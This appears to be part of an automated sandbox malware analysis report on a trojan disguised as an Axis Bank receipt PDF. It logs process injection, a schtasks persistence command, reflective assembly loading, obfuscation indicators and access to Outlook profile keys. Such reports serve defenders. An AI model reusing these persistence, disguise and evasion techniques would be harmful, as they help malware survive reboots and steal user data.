Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OkLsTLaTTZVp" /XML "C:\Users\user\AppData\Local\Temp\tmp6A22.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process created: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe "C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe"
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\sc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: firefox.pdbP source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2505454273.000000000873C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000000.2097797410.00000000006EE000.00000002.00000001.01000000.0000000D.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000000.2139591971.00000000006EE000.00000002.00000001.01000000.0000000D.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000000.2269120366.00000000006EE000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: wntdll.pdbUGP source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2177359559.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2176924352.000000000317D000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2178908542.0000000003327000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4522293458.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4522293458.000000000366E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000002.2297308003.000000000317E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000003.2290148261.0000000002C71000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000013.00000002.2297308003.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000003.2291974518.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: UZhG.pdb source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, OkLsTLaTTZVp.exe.0.dr
Source: Binary string: sc.pdbUGP source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2176817189.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000002.4516355871.0000000000579000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000003.2115638923.000000000056B000.00000004.00000020.00020000.00000000.sdmp, OkLsTLaTTZVp.exe, 00000011.00000002.2290857995.00000000016C8000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000002.4520125236.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000003.2152244914.00000000014EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2177359559.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, sc.exe, sc.exe, 0000000E.00000003.2176924352.000000000317D000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2178908542.0000000003327000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4522293458.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4522293458.000000000366E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000002.2297308003.000000000317E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000003.2290148261.0000000002C71000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000013.00000002.2297308003.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000003.2291974518.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: UZhG.pdbSHA256 source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, OkLsTLaTTZVp.exe.0.dr
Source: Binary string: sc.pdb source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2176817189.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000002.4516355871.0000000000579000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000003.2115638923.000000000056B000.00000004.00000020.00020000.00000000.sdmp, OkLsTLaTTZVp.exe, 00000011.00000002.2290857995.00000000016C8000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000002.4520125236.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000003.2152244914.00000000014EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2505454273.000000000873C000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6a70000.8.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.249674c.4.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, Menu.cs .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: OkLsTLaTTZVp.exe.0.dr, Menu.cs .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6a70000.8.raw.unpack, I1Ds3abkUA5mh3kywv.cs .Net Code: hyVW2X9uL System.Reflection.Assembly.Load(byte[])
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, pZk8OOHpFXGPippkEB.cs .Net Code: zRsDxbBdYt System.Reflection.Assembly.Load(byte[])
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.249674c.4.raw.unpack, I1Ds3abkUA5mh3kywv.cs .Net Code: hyVW2X9uL System.Reflection.Assembly.Load(byte[])
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, pZk8OOHpFXGPippkEB.cs .Net Code: zRsDxbBdYt System.Reflection.Assembly.Load(byte[])
Source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, I1Ds3abkUA5mh3kywv.cs .Net Code: hyVW2X9uL System.Reflection.Assembly.Load(byte[])
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: 0xD0FDA43C [Sat Feb 8 23:39:40 2081 UTC]
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_06E23644 push cs; retf 0_2_06E23647
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0042D963 pushfd ; retf 10_2_0042D96E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0042F1A2 push eax; ret 10_2_0042F1A4
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00401AC4 push es; retf 10_2_00401ACA
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00415AB3 push ss; iretd 10_2_00415AC9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00405346 push ds; iretd 10_2_00405352
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00419333 push es; iretd 10_2_0041933B
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00401BF9 push es; retf 10_2_00401BFA
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00418C53 push ss; ret 10_2_00418C61
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0041DC5D push es; retf 10_2_0041DC5E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00419D49 push edx; retf 10_2_00419D50
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00403670 push eax; ret 10_2_00403672
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00412E00 push esp; retf 10_2_00412E03
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00412ED2 push esp; retf 10_2_00412F4C
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00405F38 push esi; ret 10_2_00405F39
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0041A7CE pushad ; retf 10_2_0041A7CF
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A5225F pushad ; ret 10_2_01A527F9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A527FA pushad ; ret 10_2_01A527F9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A809AD push ecx; mov dword ptr [esp], ecx 10_2_01A809B6
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A5283D push eax; iretd 10_2_01A52858
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A5135E push eax; iretd 10_2_01A51369
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_07612BCD pushfd ; retf 11_2_07612BCF
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_07613644 push cs; retf 11_2_07613647
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_07612C18 pushfd ; retf 11_2_07612C19
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_034D225F pushad ; ret 14_2_034D27F9
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_034D27FA pushad ; ret 14_2_034D27F9
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035009AD push ecx; mov dword ptr [esp], ecx 14_2_035009B6
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_034D283D push eax; iretd 14_2_034D2858
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_034D135E push eax; iretd 14_2_034D1369
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B5A2F0 pushfd ; retf 14_2_02B5A2FB
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B466D6 push edx; retf 14_2_02B466DD
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: section name: .text entropy: 7.962604649793217
Source: OkLsTLaTTZVp.exe.0.dr Static PE information: section name: .text entropy: 7.962604649793217
Source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, R87QTajabri3WprdxA.cs High entropy of concatenated method names: 'SoFXXYTXBr', 'VXePqW7LxoGttIrQMM', 'VJKqh4rSy8UE5CPs2d', 'w7T6rNymrPsVe05ZjX', 'Qa5usbZfG', 'UsaN6r2JI', 'Dispose', 'xdE70OV1R', 'WKG8Nh2TLfQX7DMBJq', 'FCyDZoO16YhsTUYx7V'
Source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, I1Ds3abkUA5mh3kywv.cs High entropy of concatenated method names: 'I6pnpGMEc', 'pUPSoKeTB', 'w3OonGh86', 'S3aaCOvyF', 'MagvcleIh', 'hvmph4XfL', 'eXtqEM8mO', 'RC38AH4Bb', 'hyVW2X9uL', 'AbHynsT40'
Source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs High entropy of concatenated method names: 'sRJJ4PC1lt6MgSX9oLN', 'qCuPUJCYMdGJYrcKdqj', 'T9OMNMJAsS', 'KH71sVC96gudd8OjhqS', 'qSoaq8CnboJYXbPCm1H', 'XtbiVDCeUWVlZdG2V08', 'D2TFRiCIaLSytg31rTE', 'MtxGm4CM57HGXUKQMIN', 'RgtTUJcyZL', 'eFmMT9Tlnp'
Source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, QEHxtuXFnnkJABhbAo.cs High entropy of concatenated method names: 'Geosg7Hdn', 'wwIBOnTmd', 'siWV4YECO', 'k32FNitut', 'cUAG5mh3k', 'JwvHwu9Dw', 'cr1hyajqeLqaQ4F9dK', 'Pgut89mcfAIn6Hs5oN', 'Dispose', 'MoveNext'
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File created: \axis bank - 67 account pending bank receipt.pdf.exe
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File created: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe

Boot Survival

Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OkLsTLaTTZVp" /XML "C:\Users\user\AppData\Local\Temp\tmp566C.tmp"
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"

Hooking and other Techniques for Hiding and Protection

Source: Possible double extension: pdf.exe Static PE information: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe PID: 3800, type: MEMORYSTR
